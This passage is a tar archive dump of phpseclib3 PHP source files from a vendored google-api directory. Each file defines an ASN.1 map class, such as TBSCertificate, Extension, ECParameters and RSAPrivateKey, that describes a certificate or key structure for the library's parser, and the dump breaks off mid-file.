http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * Time * * @author Jim Wigginton */ abstract class Time { const MAP = [ 'type' => ASN1::TYPE_CHOICE, 'children' => [ 'utcTime' => ['type' => ASN1::TYPE_UTC_TIME], 'generalTime' => ['type' => ASN1::TYPE_GENERALIZED_TIME] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/BuiltInDomainDefinedAttribute.php000064400000001305147600400120026603 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * BuiltInDomainDefinedAttribute * * @author Jim Wigginton */ abstract class BuiltInDomainDefinedAttribute { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'type' => ['type' => ASN1::TYPE_PRINTABLE_STRING], 'value' => ['type' => ASN1::TYPE_PRINTABLE_STRING] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PolicyInformation.php000064400000001515147600400120024412 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * PolicyInformation * * @author Jim Wigginton */ abstract class PolicyInformation { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'policyIdentifier' => CertPolicyId::MAP, 'policyQualifiers' => [ 'type' => ASN1::TYPE_SEQUENCE, 'min' => 0, 'max' => -1, 'optional' => true, 'children' => PolicyQualifierInfo::MAP ] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/RelativeDistinguishedName.php000064400000001722147600400120026045 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * RelativeDistinguishedName * * In practice, RDNs containing multiple name-value pairs (called "multivalued RDNs") are rare, * but they can be useful at times when either there is no unique attribute in the entry or you * want to ensure that the entry's DN contains some useful identifying information. * * - https://www.opends.org/wiki/page/DefinitionRelativeDistinguishedName * * @author Jim Wigginton */ abstract class RelativeDistinguishedName { const MAP = [ 'type' => ASN1::TYPE_SET, 'min' => 1, 'max' => -1, 'children' => AttributeTypeAndValue::MAP ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/EcdsaSigValue.php000064400000001174147600400120023425 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * EcdsaSigValue * * @author Jim Wigginton */ abstract class EcdsaSigValue { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'r' => ['type' => ASN1::TYPE_INTEGER], 's' => ['type' => ASN1::TYPE_INTEGER] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/BaseDistance.php000064400000000742147600400120023273 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * BaseDistance * * @author Jim Wigginton */ abstract class BaseDistance { const MAP = ['type' => ASN1::TYPE_INTEGER]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PolicyMappings.php000064400000001416147600400120023703 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * PolicyMappings * * @author Jim Wigginton */ abstract class PolicyMappings { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => -1, 'children' => [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'issuerDomainPolicy' => CertPolicyId::MAP, 'subjectDomainPolicy' => CertPolicyId::MAP ] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CRLDistributionPoints.php000064400000001143147600400120025157 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * CRLDistributionPoints * * @author Jim Wigginton */ abstract class CRLDistributionPoints { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => -1, 'children' => DistributionPoint::MAP ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/AuthorityInfoAccessSyntax.php000064400000001157147600400120026104 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * AuthorityInfoAccessSyntax * * @author Jim Wigginton */ abstract class AuthorityInfoAccessSyntax { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => -1, 'children' => AccessDescription::MAP ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PublicKeyInfo.php000064400000001455147600400120023453 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * PublicKeyInfo * * this format is not formally defined anywhere but is none-the-less the form you * get when you do "openssl rsa -in private.pem -outform PEM -pubout" * * @author Jim Wigginton */ abstract class PublicKeyInfo { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'publicKeyAlgorithm' => AlgorithmIdentifier::MAP, 'publicKey' => ['type' => ASN1::TYPE_BIT_STRING] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Prime_p.php000064400000000723147600400120022340 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * Prime_p * * @author Jim Wigginton */ abstract class Prime_p { const MAP = ['type' => ASN1::TYPE_INTEGER]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PBMAC1params.php000064400000001311147600400120023046 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * PBMAC1params * * from https://tools.ietf.org/html/rfc2898#appendix-A.3 * * @author Jim Wigginton */ abstract class PBMAC1params { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'keyDerivationFunc' => AlgorithmIdentifier::MAP, 'messageAuthScheme' => AlgorithmIdentifier::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/DirectoryString.php000064400000001562147600400120024102 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * DirectoryString * * @author Jim Wigginton */ abstract class DirectoryString { const MAP = [ 'type' => ASN1::TYPE_CHOICE, 'children' => [ 'teletexString' => ['type' => ASN1::TYPE_TELETEX_STRING], 'printableString' => ['type' => ASN1::TYPE_PRINTABLE_STRING], 'universalString' => ['type' => ASN1::TYPE_UNIVERSAL_STRING], 'utf8String' => ['type' => ASN1::TYPE_UTF8_STRING], 'bmpString' => ['type' => ASN1::TYPE_BMP_STRING] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/KeyPurposeId.php000064400000000754147600400120023334 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * KeyPurposeId * * @author Jim Wigginton */ abstract class KeyPurposeId { const MAP = ['type' => ASN1::TYPE_OBJECT_IDENTIFIER]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/AttributeValue.php000064400000000744147600400120023710 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * AttributeValue * * @author Jim Wigginton */ abstract class AttributeValue { const MAP = ['type' => ASN1::TYPE_ANY]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/DisplayText.php000064400000001420147600400120023212 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * DisplayText * * @author Jim Wigginton */ abstract class DisplayText { const MAP = [ 'type' => ASN1::TYPE_CHOICE, 'children' => [ 'ia5String' => ['type' => ASN1::TYPE_IA5_STRING], 'visibleString' => ['type' => ASN1::TYPE_VISIBLE_STRING], 'bmpString' => ['type' => ASN1::TYPE_BMP_STRING], 'utf8String' => ['type' => ASN1::TYPE_UTF8_STRING] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Pentanomial.php000064400000001315147600400120023212 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * Pentanomial * * @author Jim Wigginton */ abstract class Pentanomial { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'k1' => ['type' => ASN1::TYPE_INTEGER], // k1 > 0 'k2' => ['type' => ASN1::TYPE_INTEGER], // k2 > k1 'k3' => ['type' => ASN1::TYPE_INTEGER], // k3 > h2 ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Curve.php000064400000001305147600400120022026 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * Curve * * @author Jim Wigginton */ abstract class Curve { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'a' => FieldElement::MAP, 'b' => FieldElement::MAP, 'seed' => [ 'type' => ASN1::TYPE_BIT_STRING, 'optional' => true ] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/ECPoint.php000064400000000730147600400120022244 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * ECPoint * * @author Jim Wigginton */ abstract class ECPoint { const MAP = ['type' => ASN1::TYPE_OCTET_STRING]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/HashAlgorithm.php000064400000000704147600400120023476 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; /** * HashAglorithm * * @author Jim Wigginton */ abstract class HashAlgorithm { const MAP = AlgorithmIdentifier::MAP; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/GeneralSubtrees.php000064400000001116147600400120024034 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * GeneralSubtrees * * @author Jim Wigginton */ abstract class GeneralSubtrees { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => -1, 'children' => GeneralSubtree::MAP ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/BasicConstraints.php000064400000001476147600400120024224 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * BasicConstraints * * @author Jim Wigginton */ abstract class BasicConstraints { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'cA' => [ 'type' => ASN1::TYPE_BOOLEAN, 'optional' => true, 'default' => false ], 'pathLenConstraint' => [ 'type' => ASN1::TYPE_INTEGER, 'optional' => true ] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CertificateSerialNumber.php000064400000001003147600400120025470 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * CertificateSerialNumber * * @author Jim Wigginton */ abstract class CertificateSerialNumber { const MAP = ['type' => ASN1::TYPE_INTEGER]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/AuthorityKeyIdentifier.php000064400000002123147600400120025405 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * AuthorityKeyIdentifier * * @author Jim Wigginton */ abstract class AuthorityKeyIdentifier { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'keyIdentifier' => [ 'constant' => 0, 'optional' => true, 'implicit' => true ] + KeyIdentifier::MAP, 'authorityCertIssuer' => [ 'constant' => 1, 'optional' => true, 'implicit' => true ] + GeneralNames::MAP, 'authorityCertSerialNumber' => [ 'constant' => 2, 'optional' => true, 'implicit' => true ] + CertificateSerialNumber::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/AccessDescription.php000064400000001234147600400120024350 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * AccessDescription * * @author Jim Wigginton */ abstract class AccessDescription { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'accessMethod' => ['type' => ASN1::TYPE_OBJECT_IDENTIFIER], 'accessLocation' => GeneralName::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/IssuingDistributionPoint.php000064400000003536147600400120026005 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * IssuingDistributionPoint * * @author Jim Wigginton */ abstract class IssuingDistributionPoint { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'distributionPoint' => [ 'constant' => 0, 'optional' => true, 'explicit' => true ] + DistributionPointName::MAP, 'onlyContainsUserCerts' => [ 'type' => ASN1::TYPE_BOOLEAN, 'constant' => 1, 'optional' => true, 'default' => false, 'implicit' => true ], 'onlyContainsCACerts' => [ 'type' => ASN1::TYPE_BOOLEAN, 'constant' => 2, 'optional' => true, 'default' => false, 'implicit' => true ], 'onlySomeReasons' => [ 'constant' => 3, 'optional' => true, 'implicit' => true ] + ReasonFlags::MAP, 'indirectCRL' => [ 'type' => ASN1::TYPE_BOOLEAN, 'constant' => 4, 'optional' => true, 'default' => false, 'implicit' => true ], 'onlyContainsAttributeCerts' => [ 'type' => ASN1::TYPE_BOOLEAN, 'constant' => 5, 'optional' => true, 'default' => false, 'implicit' => true ] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/TerminalIdentifier.php000064400000000775147600400120024532 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * TerminalIdentifier * * @author Jim Wigginton */ abstract class TerminalIdentifier { const MAP = ['type' => ASN1::TYPE_PRINTABLE_STRING]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PersonalName.php000064400000002503147600400120023327 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * PersonalName * * @author Jim Wigginton */ abstract class PersonalName { const MAP = [ 'type' => ASN1::TYPE_SET, 'children' => [ 'surname' => [ 'type' => ASN1::TYPE_PRINTABLE_STRING, 'constant' => 0, 'optional' => true, 'implicit' => true ], 'given-name' => [ 'type' => ASN1::TYPE_PRINTABLE_STRING, 'constant' => 1, 'optional' => true, 'implicit' => true ], 'initials' => [ 'type' => ASN1::TYPE_PRINTABLE_STRING, 'constant' => 2, 'optional' => true, 'implicit' => true ], 'generation-qualifier' => [ 'type' => ASN1::TYPE_PRINTABLE_STRING, 'constant' => 3, 'optional' => true, 'implicit' => true ] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/SignedPublicKeyAndChallenge.php000064400000001377147600400120026222 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * SignedPublicKeyAndChallenge * * @author Jim Wigginton */ abstract class SignedPublicKeyAndChallenge { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'publicKeyAndChallenge' => PublicKeyAndChallenge::MAP, 'signatureAlgorithm' => AlgorithmIdentifier::MAP, 'signature' => ['type' => ASN1::TYPE_BIT_STRING] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/RC2CBCParameter.php000064400000001431147600400120023501 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * RC2CBCParameter * * from https://tools.ietf.org/html/rfc2898#appendix-A.3 * * @author Jim Wigginton */ abstract class RC2CBCParameter { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'rc2ParametersVersion' => [ 'type' => ASN1::TYPE_INTEGER, 'optional' => true ], 'iv' => ['type' => ASN1::TYPE_OCTET_STRING] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Extensions.php000064400000001316147600400120023103 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * Extensions * * @author Jim Wigginton */ abstract class Extensions { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'min' => 1, // technically, it's MAX, but we'll assume anything < 0 is MAX 'max' => -1, // if 'children' isn't an array then 'min' and 'max' must be defined 'children' => Extension::MAP ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Extension.php000064400000002053147600400120022717 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * Extension * * A certificate using system MUST reject the certificate if it encounters * a critical extension it does not recognize; however, a non-critical * extension may be ignored if it is not recognized. * * http://tools.ietf.org/html/rfc5280#section-4.2 * * @author Jim Wigginton */ abstract class Extension { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'extnId' => ['type' => ASN1::TYPE_OBJECT_IDENTIFIER], 'critical' => [ 'type' => ASN1::TYPE_BOOLEAN, 'optional' => true, 'default' => false ], 'extnValue' => ['type' => ASN1::TYPE_OCTET_STRING] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/netscape_ca_policy_url.php000064400000001003147600400120025443 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * netscape_ca_policy_url * * @author Jim Wigginton */ abstract class netscape_ca_policy_url { const MAP = ['type' => ASN1::TYPE_IA5_STRING]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/DHParameter.php000064400000001526147600400120023103 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * DHParameter * * @author Jim Wigginton */ abstract class DHParameter { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'prime' => ['type' => ASN1::TYPE_INTEGER], 'base' => ['type' => ASN1::TYPE_INTEGER], 'privateValueLength' => [ 'type' => ASN1::TYPE_INTEGER, 'optional' => true ] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/OrganizationName.php000064400000000767147600400120024222 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * OrganizationName * * @author Jim Wigginton */ abstract class OrganizationName { const MAP = ['type' => ASN1::TYPE_PRINTABLE_STRING]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/TBSCertificate.php000064400000004127147600400120023542 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * TBSCertificate * * @author Jim Wigginton */ abstract class TBSCertificate { // assert($TBSCertificate['children']['signature'] == $Certificate['children']['signatureAlgorithm']) const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ // technically, default implies optional, but we'll define it as being optional, none-the-less, just to // reenforce that fact 'version' => [ 'type' => ASN1::TYPE_INTEGER, 'constant' => 0, 'optional' => true, 'explicit' => true, 'mapping' => ['v1', 'v2', 'v3'], 'default' => 'v1' ], 'serialNumber' => CertificateSerialNumber::MAP, 'signature' => AlgorithmIdentifier::MAP, 'issuer' => Name::MAP, 'validity' => Validity::MAP, 'subject' => Name::MAP, 'subjectPublicKeyInfo' => SubjectPublicKeyInfo::MAP, // implicit means that the T in the TLV structure is to be rewritten, regardless of the type 'issuerUniqueID' => [ 'constant' => 1, 'optional' => true, 'implicit' => true ] + UniqueIdentifier::MAP, 'subjectUniqueID' => [ 'constant' => 2, 'optional' => true, 'implicit' => true ] + UniqueIdentifier::MAP, // doesn't use the EXPLICIT keyword but if // it's not IMPLICIT, it's EXPLICIT 'extensions' => [ 'constant' => 3, 'optional' => true, 'explicit' => true ] + Extensions::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/AttributeType.php000064400000000757147600400120023561 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * AttributeType * * @author Jim Wigginton */ abstract class AttributeType { const MAP = ['type' => ASN1::TYPE_OBJECT_IDENTIFIER]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/ECParameters.php000064400000002164147600400120023261 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * ECParameters * * ECParameters ::= CHOICE { * namedCurve OBJECT IDENTIFIER * -- implicitCurve NULL * -- specifiedCurve SpecifiedECDomain * } * -- implicitCurve and specifiedCurve MUST NOT be used in PKIX. * -- Details for SpecifiedECDomain can be found in [X9.62]. * -- Any future additions to this CHOICE should be coordinated * -- with ANSI X9. * * @author Jim Wigginton */ abstract class ECParameters { const MAP = [ 'type' => ASN1::TYPE_CHOICE, 'children' => [ 'namedCurve' => ['type' => ASN1::TYPE_OBJECT_IDENTIFIER], 'implicitCurve' => ['type' => ASN1::TYPE_NULL], 'specifiedCurve' => SpecifiedECDomain::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Attributes.php000064400000001065147600400120023073 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * Attributes * * @author Jim Wigginton */ abstract class Attributes { const MAP = [ 'type' => ASN1::TYPE_SET, 'min' => 1, 'max' => -1, 'children' => Attribute::MAP ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PrivateKeyUsagePeriod.php000064400000001651147600400120025161 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * PrivateKeyUsagePeriod * * @author Jim Wigginton */ abstract class PrivateKeyUsagePeriod { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'notBefore' => [ 'constant' => 0, 'optional' => true, 'implicit' => true, 'type' => ASN1::TYPE_GENERALIZED_TIME], 'notAfter' => [ 'constant' => 1, 'optional' => true, 'implicit' => true, 'type' => ASN1::TYPE_GENERALIZED_TIME] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Characteristic_two.php000064400000001446147600400120024571 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * Characteristic_two * * @author Jim Wigginton */ abstract class Characteristic_two { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'm' => ['type' => ASN1::TYPE_INTEGER], // field size 2**m 'basis' => ['type' => ASN1::TYPE_OBJECT_IDENTIFIER], 'parameters' => [ 'type' => ASN1::TYPE_ANY, 'optional' => true ] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/ORAddress.php000064400000001437147600400120022576 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * ORAddress * * @author Jim Wigginton */ abstract class ORAddress { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'built-in-standard-attributes' => BuiltInStandardAttributes::MAP, 'built-in-domain-defined-attributes' => ['optional' => true] + BuiltInDomainDefinedAttributes::MAP, 'extension-attributes' => ['optional' => true] + ExtensionAttributes::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/KeyUsage.php000064400000001413147600400120022457 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * KeyUsage * * @author Jim Wigginton */ abstract class KeyUsage { const MAP = [ 'type' => ASN1::TYPE_BIT_STRING, 'mapping' => [ 'digitalSignature', 'nonRepudiation', 'keyEncipherment', 'dataEncipherment', 'keyAgreement', 'keyCertSign', 'cRLSign', 'encipherOnly', 'decipherOnly' ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/NoticeReference.php000064400000001442147600400120024004 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * NoticeReference * * @author Jim Wigginton */ abstract class NoticeReference { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'organization' => DisplayText::MAP, 'noticeNumbers' => [ 'type' => ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => 200, 'children' => ['type' => ASN1::TYPE_INTEGER] ] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/RSAPrivateKey.php000064400000002577147600400120023407 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * RSAPrivateKey * * @author Jim Wigginton */ abstract class RSAPrivateKey { // version must be multi if otherPrimeInfos present const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'version' => [ 'type' => ASN1::TYPE_INTEGER, 'mapping' => ['two-prime', 'multi'] ], 'modulus' => ['type' => ASN1::TYPE_INTEGER], // n 